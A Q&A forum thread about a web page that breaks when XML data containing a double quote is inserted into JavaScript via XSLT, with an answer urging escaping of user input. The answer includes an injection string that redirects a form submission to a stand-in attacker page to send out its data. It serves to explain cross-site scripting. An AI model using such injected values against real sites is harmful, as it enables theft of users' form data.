Home/ Questions/Q 606177
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-13T17:13:36+00:00

I am not sure I am going to be able to explain this one

  • 0

I am not sure I am going to be able to explain this one right as it may be difficult for me to explain, but I am going to try.

I have a web form which it publish the data to a XML file, then it shows the data in another web page.

Everything works fine, but when the user types a double quote character, at the time the web page try to display the data it crashes due to the double quote symbol, which it make sense as it may be considered as an unfinished string by javascript.

There is also something it is worth mention, and that is that the problem only occurs on a section of the form, where consist of a table which its populated with an array created based of a collection of elements from the XML and then insert the text from the array to the table cells using the innerHTML.

eg.

XML

<node1>
  <node2> test "1</node2>
</node1>

<script type="text/javascript">
  alert("<xsl:value-of select="node1/node2">");
<script>

This will not work, maybe if I get any workaround to this, I can fix the rest.

Sorry guys if I have not explain myself well enough, I don’t know how to expose this problem any better. I would be happy to answer any question if you need it.

Please, note that if any of you have any answer, it has to be javascript, no jquery.

Thanks.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Always escape user input. Your bug is a benign example of the problems that can occur, but it means you’re also probably vulnerable to a code injection attack, such as cross-site scripting.

    Escaping

    Here’s what Wikipedia has to say about escaping. Here’s an overly-simplified example of what it means. Assume that you have the following JavaScript and that I haven’t made any silly errors in it (since I just made it up):

    function unsafeAlert() {
    alert("You shouldn't be doing this!\n" + document.getElementsById('userInputField').value);
}

    What happens if the user types in something like '); document.forms[0].action="http://www.example.com/maliciousPage.html";document.forms[0].submit();"? Suddenly, your alert causes the form (which might contain sensitive data) to be submitted to an attacker’s page. This is obviously a problem. You should have some library code somewhere that escapes the value before you attempt to alert it. This will do things like putting slashes in front of quotes, etc. Also, you probably shouldn’t try to write such code yourself, since escaping logic is always at least 10 times harder than you think it will be. You should definitely be getting logic like this from a library somewhere.

    • 0